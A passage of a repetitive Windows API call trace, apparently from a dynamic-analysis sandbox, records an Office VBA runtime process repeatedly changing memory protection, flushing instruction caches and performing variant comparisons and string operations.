[0112.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.258] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.258] GetCurrentProcess () returned 0xffffffff [0112.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.258] GetCurrentProcess () returned 0xffffffff [0112.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.258] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.259] GetCurrentProcess () returned 0xffffffff [0112.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.259] GetCurrentProcess () returned 0xffffffff [0112.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.259] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.260] GetCurrentProcess () returned 0xffffffff [0112.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.260] GetCurrentProcess () returned 0xffffffff [0112.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.260] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.260] GetCurrentProcess () returned 0xffffffff [0112.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.260] GetCurrentProcess () returned 0xffffffff [0112.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.260] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.261] GetCurrentProcess () returned 0xffffffff [0112.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.261] GetCurrentProcess () returned 0xffffffff [0112.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.261] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.262] GetCurrentProcess () returned 0xffffffff [0112.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.262] GetCurrentProcess () returned 0xffffffff [0112.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.262] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.262] GetCurrentProcess () returned 0xffffffff [0112.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.262] GetCurrentProcess () returned 0xffffffff [0112.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.262] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.263] GetCurrentProcess () returned 0xffffffff [0112.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.263] GetCurrentProcess () returned 0xffffffff [0112.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.263] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.264] GetCurrentProcess () returned 0xffffffff [0112.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.264] GetCurrentProcess () returned 0xffffffff [0112.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.264] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.264] GetCurrentProcess () returned 0xffffffff [0112.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.264] GetCurrentProcess () returned 0xffffffff [0112.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.264] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.265] GetCurrentProcess () returned 0xffffffff [0112.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.265] GetCurrentProcess () returned 0xffffffff [0112.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.265] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.265] GetCurrentProcess () returned 0xffffffff [0112.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.265] GetCurrentProcess () returned 0xffffffff [0112.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.266] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.266] GetCurrentProcess () returned 0xffffffff [0112.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.266] GetCurrentProcess () returned 0xffffffff [0112.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.266] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.267] GetCurrentProcess () returned 0xffffffff [0112.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.273] GetCurrentProcess () returned 0xffffffff [0112.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.273] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.274] GetCurrentProcess () returned 0xffffffff [0112.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.274] GetCurrentProcess () returned 0xffffffff [0112.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.274] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.275] GetCurrentProcess () returned 0xffffffff [0112.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.275] GetCurrentProcess () returned 0xffffffff [0112.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.275] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.275] GetCurrentProcess () returned 0xffffffff [0112.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.275] GetCurrentProcess () returned 0xffffffff [0112.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.276] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.276] GetCurrentProcess () returned 0xffffffff [0112.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.276] GetCurrentProcess () returned 0xffffffff [0112.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.276] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.277] GetCurrentProcess () returned 0xffffffff [0112.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.277] GetCurrentProcess () returned 0xffffffff [0112.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.277] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.277] GetCurrentProcess () returned 0xffffffff [0112.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.277] GetCurrentProcess () returned 0xffffffff [0112.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.277] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.278] GetCurrentProcess () returned 0xffffffff [0112.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.278] GetCurrentProcess () returned 0xffffffff [0112.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.278] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.279] GetCurrentProcess () returned 0xffffffff [0112.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.279] GetCurrentProcess () returned 0xffffffff [0112.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.279] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.279] GetCurrentProcess () returned 0xffffffff [0112.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.279] GetCurrentProcess () returned 0xffffffff [0112.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.279] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.280] GetCurrentProcess () returned 0xffffffff [0112.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.280] GetCurrentProcess () returned 0xffffffff [0112.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.280] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.280] GetCurrentProcess () returned 0xffffffff [0112.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.281] GetCurrentProcess () returned 0xffffffff [0112.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.281] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.281] GetCurrentProcess () returned 0xffffffff [0112.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.281] GetCurrentProcess () returned 0xffffffff [0112.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.281] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.282] GetCurrentProcess () returned 0xffffffff [0112.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.282] GetCurrentProcess () returned 0xffffffff [0112.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.282] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.285] GetCurrentProcess () returned 0xffffffff [0112.285] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.285] GetCurrentProcess () returned 0xffffffff [0112.285] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.285] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.286] GetCurrentProcess () returned 0xffffffff [0112.286] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.286] GetCurrentProcess () returned 0xffffffff [0112.286] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.286] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.287] GetCurrentProcess () returned 0xffffffff [0112.287] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.287] GetCurrentProcess () returned 0xffffffff [0112.287] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.287] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.287] GetCurrentProcess () returned 0xffffffff [0112.287] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.288] GetAsyncKeyState (vKey=3) returned 0 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.288] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.289] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0112.289] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x197b90 | out: ppsaOut=0x197b90) returned 0x0 [0112.289] SafeArrayAllocData (psa=0xc877b88) returned 0x0 [0112.309] VarBstrCat (in: bstrLeft="&", bstrRight="H", pbstrResult=0x197ac4 | out: pbstrResult=0x197ac4) returned 0x0 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.310] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.310] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0112.310] CRetailMalloc_Alloc () returned 0xcb7ab50 [0112.310] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.310] memcpy (in: _Dst=0xd01516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.310] memcpy (in: _Dst=0xd015170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.310] memcpy (in: _Dst=0xd01516c, _Src=0x1973c8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.310] memcpy (in: _Dst=0xd015170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197204, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0112.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0112.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0112.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0112.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0112.311] CRetailMalloc_Alloc () returned 0xcb27158 [0112.311] _mbscpy_s (in: _Dst=0xcb27158, _DstSizeInBytes=0x4, _Src=0x111e1146 | out: _Dst=0xcb27158) returned 0x0 [0112.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b9a, cbMultiByte=11, lpWideCharStr=0x197274, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0112.312] CRetailMalloc_Free () returned 0x1 [0112.312] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0112.312] memcpy (in: _Dst=0xcb7ab98, _Src=0x197484, _Size=0x18 | out: _Dst=0xcb7ab98) returned 0xcb7ab98 [0112.312] CRetailMalloc_Realloc () returned 0xcb7ab50 [0112.312] CRetailMalloc_Free () returned 0x1 [0112.312] GetCurrentProcess () returned 0xffffffff [0112.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.312] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.313] GetCurrentProcess () returned 0xffffffff [0112.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.313] GetCurrentProcess () returned 0xffffffff [0112.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.313] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.314] GetCurrentProcess () returned 0xffffffff [0112.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.315] GetCurrentProcess () returned 0xffffffff [0112.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.315] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.315] GetCurrentProcess () returned 0xffffffff [0112.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.315] GetCurrentProcess () returned 0xffffffff [0112.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.315] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.316] GetCurrentProcess () returned 0xffffffff [0112.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.316] GetCurrentProcess () returned 0xffffffff [0112.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.316] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.316] GetCurrentProcess () returned 0xffffffff [0112.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.316] GetCurrentProcess () returned 0xffffffff [0112.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.317] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.317] GetCurrentProcess () returned 0xffffffff [0112.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.317] GetCurrentProcess () returned 0xffffffff [0112.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.317] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.318] GetCurrentProcess () returned 0xffffffff [0112.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.318] GetCurrentProcess () returned 0xffffffff [0112.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.318] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.318] GetCurrentProcess () returned 0xffffffff [0112.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.318] GetCurrentProcess () returned 0xffffffff [0112.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.318] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.319] GetCurrentProcess () returned 0xffffffff [0112.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.319] GetCurrentProcess () returned 0xffffffff [0112.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.319] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.320] GetCurrentProcess () returned 0xffffffff [0112.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.320] GetCurrentProcess () returned 0xffffffff [0112.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.320] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.320] GetCurrentProcess () returned 0xffffffff [0112.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.320] GetCurrentProcess () returned 0xffffffff [0112.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.320] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.321] GetCurrentProcess () returned 0xffffffff [0112.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.321] GetCurrentProcess () returned 0xffffffff [0112.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.321] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.321] GetCurrentProcess () returned 0xffffffff [0112.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.322] GetCurrentProcess () returned 0xffffffff [0112.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.322] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.322] GetCurrentProcess () returned 0xffffffff [0112.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.322] GetCurrentProcess () returned 0xffffffff [0112.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.322] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.323] GetCurrentProcess () returned 0xffffffff [0112.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.323] GetCurrentProcess () returned 0xffffffff [0112.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.323] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.323] GetCurrentProcess () returned 0xffffffff [0112.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.323] GetCurrentProcess () returned 0xffffffff [0112.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.323] VirtualProtect (in: lpAddress=0xf5d00c8, 